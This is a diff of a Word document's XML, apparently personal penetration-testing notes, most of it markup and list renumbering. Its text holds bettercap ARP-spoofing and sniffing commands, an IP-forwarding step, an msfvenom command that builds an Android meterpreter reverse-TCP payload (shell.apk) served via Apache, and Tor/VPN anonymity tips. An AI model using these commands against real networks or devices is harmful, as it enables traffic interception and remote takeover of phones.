+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>arp.spoof.targets</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5088,31 +6434,81 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;set net.sniff.local true</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;arp.spoof on</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;net.sniff on</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>Note: If you want to run previous – You need to create a sniff.cap</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;bettercap -iface eth0 -caplet sniff.cap</w:t>
-            </w:r>
+              <w:t xml:space="preserve">&gt;set </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>net.sniff.local</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> true</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>arp.spoof</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> on</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>net.sniff</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> on</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">Note: If you want to run previous – You need to create a </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sniff.cap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>bettercap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>iface</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> eth0 -caplet </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sniff.cap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p/>
           <w:p/>
@@ -5150,8 +6546,13 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;cat /proc/sys/net/ipv4/ip_forward</w:t>
-            </w:r>
+              <w:t>&gt;cat /proc/sys/net/ipv4/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ip_forward</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -5161,8 +6562,13 @@
           <w:p/>
           <w:p>
             <w:r>
-              <w:t>&gt;echo 1 &gt; /proc/sys/net/ipv4/ip_forward</w:t>
-            </w:r>
+              <w:t>&gt;echo 1 &gt; /proc/sys/net/ipv4/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ip_forward</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p/>
           <w:p>
@@ -5199,7 +6605,15 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>Can code using scapy instead of python</w:t>
+              <w:t xml:space="preserve">Can code using </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>scapy</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> instead of python</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5376,13 +6790,50 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>&gt;msfvenom -p android/meterpreter/reverse_tcp LHOST={YOURIPADDRESS} LPORT=5555 -o shell.apk</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>&gt;sudo service apache2 start</w:t>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -p android/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>meterpreter</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>reverse_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> LHOST={YOURIPADDRESS} LPORT=5555 -o </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>shell.apk</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> service apache2 start</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -5429,7 +6880,15 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>Search in google- evil droid(Github)</w:t>
+              <w:t>Search in google- evil droid(</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Github</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5473,94 +6932,271 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>apktool</w:t>
             </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t>Anonymity</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Browsers:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="13"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Tor Browsers</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="13"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>VPN</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="13"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Proxy</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="14"/>
+              </w:numPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> apt update</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> apt-get install tor </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>torbrowser</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>-launcher</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>torbrowser</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>-launcher</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">NOTE: Check if </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>your</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> really running the TOR website</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>NOTE: on the URL link</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;https://torproject.org</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> apt-get install </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>openvpn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>&gt;https://v</w:t>
+            </w:r>
+            <w:r>
+              <w:t>pnbook.com</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">Google search: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Whoami</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>github</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
@@ -7530,6 +9166,92 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="005E4855"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="5A9C93BA"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="01BB1337"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E3D0380E"/>
@@ -7642,7 +9364,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="02193688"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3D4AB526"/>
@@ -7754,7 +9476,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="04380DAD"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="20968F74"/>
@@ -7866,7 +9588,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="18262D52"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E1AAF4B0"/>
@@ -7955,7 +9677,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1E875223"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="656431E0"/>
@@ -8044,7 +9766,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="24F21451"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="033ECDDE"/>
@@ -8156,7 +9878,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3509666A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9CD64556"/>
@@ -8245,7 +9967,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="441C32AE"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B46E632C"/>
@@ -8357,7 +10079,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="48EF3815"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6668300A"/>
@@ -8446,7 +10168,120 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="4E223810"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="F5405956"/>
+    <w:lvl w:ilvl="0" w:tplc="98EC1C2A">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Wingdings" w:cstheme="minorBidi" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="527E7511"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3D007ACE"/>
@@ -8535,7 +10370,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="66D8281C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="162256E8"/>
@@ -8624,7 +10459,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
